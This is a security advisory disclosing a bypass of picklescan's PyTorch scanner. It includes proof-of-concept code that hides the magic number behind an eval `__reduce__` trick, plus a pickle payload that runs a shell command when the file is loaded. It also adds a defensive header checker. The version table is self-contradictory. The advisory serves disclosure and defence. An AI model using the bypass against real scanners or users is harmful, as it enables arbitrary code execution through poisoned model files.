7.1

PyTorch Bypasses Picklescan's Magic Number Check

GHSA-97f8-7cmv-76j2
Summary

A vulnerability in PyTorch allows an attacker to bypass a security check in Picklescan, a tool used to detect malicious pickled files. This could potentially allow an attacker to hide malicious code in a PyTorch file, which could lead to security issues if Picklescan is used to scan these files. To protect against this, ensure that Picklescan and PyTorch are updated to the latest versions.

What to do
  • Update picklescan to version 1.0.3.
Affected software
| Vendor | Product | Affected versions | Fix available |
| --- | --- | --- | --- |
| – | picklescan | <= 1.0.3 | 1.0.3 |
Original title
Picklescan (scan_pytorch) Bypass via dynamic eval MAGIC_NUMBER
Original description
### Summary
This is a scanning bypass of the `scan_pytorch` function in `picklescan`. The implementation of [get_magic_number()](https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/torch.py#L76C5-L84) uses `pickletools.genops(data)` to read the `magic_number`, accepting it only when `opcode.name` contains `INT` or `LONG`, whereas PyTorch's implementation simply calls [pickle_module.load()](https://github.com/pytorch/pytorch/blob/134179474539648ba7dee1317959529fbd0e7f89/torch/serialization.py#L1797) to obtain the same `magic_number`. Because of this implementation difference, the magic number can be embedded in the `PyTorch` file via a dynamic `eval` using the `__reduce__` trick, so that `pickletools.genops(data)` never sees the magic number as an `INT` or `LONG` opcode while `pickle_module.load()` still returns the same value, leading to a bypass.
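As an added illustration (not part of the advisory, of picklescan or of PyTorch), the checker below applies the same `pickletools.genops` inspection to a legacy PyTorch header record and shows why the two header forms diverge: a plain integer yields an `INT`/`LONG` opcode, while a header built with `__reduce__` yields `GLOBAL`/`REDUCE` opcodes and no integer at all. It treats a header that is not a bare integer as suspicious instead of as a non-PyTorch file to skip; the sample headers are constructed in-memory pickle records, not real `.pt` files.

```python
import pickle
import pickletools

# Magic number PyTorch writes as the first pickle record of a legacy (non-zip) .pt file
MAGIC_NUMBER = 119547037146038801333356

# Opcodes that import, construct or call objects. A genuine header is a bare
# integer and never needs any of them.
CONSTRUCTIVE_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "BUILD", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",
}


def inspect_header(data: bytes) -> dict:
    """Statically inspect the first pickle in `data` without unpickling it.

    genops stops at the first STOP opcode, so only the header record is read.
    Returns the integer found in an INT/LONG opcode (None if absent) and the
    constructive opcodes seen in that record.
    """
    magic = None
    seen = set()
    for opcode, arg, _pos in pickletools.genops(data):
        if "INT" in opcode.name or "LONG" in opcode.name:  # same test as picklescan
            magic = arg
        if opcode.name in CONSTRUCTIVE_OPCODES:
            seen.add(opcode.name)
    return {"magic": magic, "constructive_opcodes": seen}


def classify_header(data: bytes) -> str:
    """Return 'ok', 'malformed' or 'suspicious'; never silently skip the file."""
    info = inspect_header(data)
    if info["constructive_opcodes"]:
        return "suspicious"      # header executes code at load time
    if info["magic"] != MAGIC_NUMBER:
        return "malformed"       # not a PyTorch header, still worth reporting
    return "ok"


# Constructed sample header records (hypothetical input, not real .pt files).
BENIGN_HEADER = pickle.dumps(MAGIC_NUMBER, protocol=2)
WRONG_MAGIC_HEADER = pickle.dumps(42, protocol=2)


class _EvalMagic:
    # Mirrors the advisory's header trick: the value is produced at load time
    # by eval('MAGIC_NUMBER') instead of being stored as an integer.
    def __reduce__(self):
        return (eval, ("MAGIC_NUMBER",))


BYPASS_HEADER = pickle.dumps(_EvalMagic(), protocol=2)  # only inspected, never loaded
```

Running `classify_header` over the three samples gives `ok`, `malformed` and `suspicious`; the bypass header contains no `INT`/`LONG` opcode at all, which is exactly the `None != 119547037146038801333356` condition in the scan output.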

### PoC
#### Attack Step 1
We can edit the source code of the function [_legacy_save()](https://github.com/pytorch/pytorch/blob/134179474539648ba7dee1317959529fbd0e7f89/torch/serialization.py#L1120) as follows:
```Python
# Inside _legacy_save(): pickle_module, f and pickle_protocol are the
# function's own locals. The payload object is written in place of the
# plain MAGIC_NUMBER record.
class payload:
    def __reduce__(self):
        return (eval, ('MAGIC_NUMBER',))

pickle_module.dump(payload(), f, protocol=pickle_protocol)
```
#### Attack Step 2
With the modified version of `PyTorch`, we run the following PoC to generate the `payload.pt`:
```Python
import torch

class payload:
    def __reduce__(self):
        # Executed when the file is unpickled by torch.load
        return (__import__('os').system, ('touch /tmp/hacked',))

# Legacy (non-zip) serialization so that the modified _legacy_save() is used
torch.save(payload(), './payload.pt', _use_new_zipfile_serialization=False)
```

#### Picklescan result
```
ERROR: Invalid magic number for file /home/pzhou/bug-bunty/pytorch/PoC/payload.pt: None != 119547037146038801333356
----------- SCAN SUMMARY -----------
Scanned files: 0
Infected files: 0
Dangerous globals: 0
```

#### Victim Step
```Python
import torch
torch.load('./payload.pt', weights_only=False)
```
The file `/tmp/hacked` is then created on the local system.

### Impact
An attacker can craft malicious `PyTorch` payloads that bypass `picklescan` and achieve arbitrary code execution (ACE/RCE) when the file is loaded.
Severity (GHSA, CVSS 4.0): 7.1
Vulnerability type: CWE-184
Published: 18 Feb 2026 · Updated: 7 Mar 2026 · First seen: 6 Mar 2026